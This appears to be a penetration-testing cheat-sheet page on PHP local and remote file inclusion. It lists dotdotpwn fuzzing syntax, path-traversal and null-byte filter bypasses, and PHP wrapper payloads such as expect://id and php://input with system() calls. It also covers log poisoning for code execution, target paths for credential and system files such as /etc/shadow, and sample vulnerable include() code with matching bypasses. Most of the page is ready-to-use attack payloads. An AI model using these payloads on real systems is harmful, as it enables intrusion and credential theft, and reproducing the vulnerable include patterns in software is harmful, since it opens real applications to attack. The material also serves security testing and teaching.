php wrappers, LFI

dotdotpwn

Note: preinstalled in latest kali iso. Works for http, ftp, tftp

dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS

Workarounds

NOTE: Read the file that is running LFI to get more information about the code.

  • Bypassing filters using ....//

  • Using null byte %00: /etc/passwd%00

  • URL encoding techniques (double encoding)

LFI wordlist

  • /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt

.php wrappers

# protocol wraper
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file

# expect wrapper
# allows to run system commands
file=expect://id

# input wrapper
file=php://input
# needs to send POST data
<?php system('id'); ?> | <?php shell_exec('id'); ?>

# filter wrappers
file=php://filter/resource=PHP-FILE
file=filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILE

LFI to RCE (linux)

# using LFI can read access log files and then log poision
# if user does not have perms to read log files; can do file descriptor way
LFI=/proc/self/fd/{NUMBER}

# once have access to log file > log-poisoning.

LFI Paths (linux)

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID_NUMBER/fd/FILE_DESCRIPTOR_NUMBER
/proc/self/environ
/proc/version
/proc/cmdline

LFI Paths (windows)

C:\Windows\System32\Drivers\etc\hosts
C:\\Windows\\System32\\Drivers\\etc\\hosts
\Windows\System32\Drivers\etc\hosts
\\Windows\\System32\\Drivers\\etc\\hosts
C:\Windows\win.ini
C:\\Windows\\win.ini
\Windows\win.ini
\\Windows\\win.ini
C:\Windows\system.ini
C:\\Windows\\system.ini
\Windows\system.ini
\\Windows\\system.ini

LFI PHP Code Analysis

<?PHP 
	include($_GET["file"]);
?>

The above code block includes any value given to the file paramter.

<?PHP 
	include("downloads/". $_GET['file']); 
?>

The above code block includes any value given to the file parameter as long as its in the downloads directory. To bypass use ../../../<>

<?PHP 
	include("downloads/". $_GET['file'].php); 
?>

The above code block includes any value given to the file parameter as long as its in the downloads directory and appends .php to the user input value. To bypass use ../../../<> and value ending with %00.

When there is substitution for ../, bypass using ....// as it will convert to ../

RFI PHP Code Analysis

Requirement for RFI to work is allow_url_fopen and allow_url_include

Previouspgp gpg cheatsheetNextport forwarding

Last updated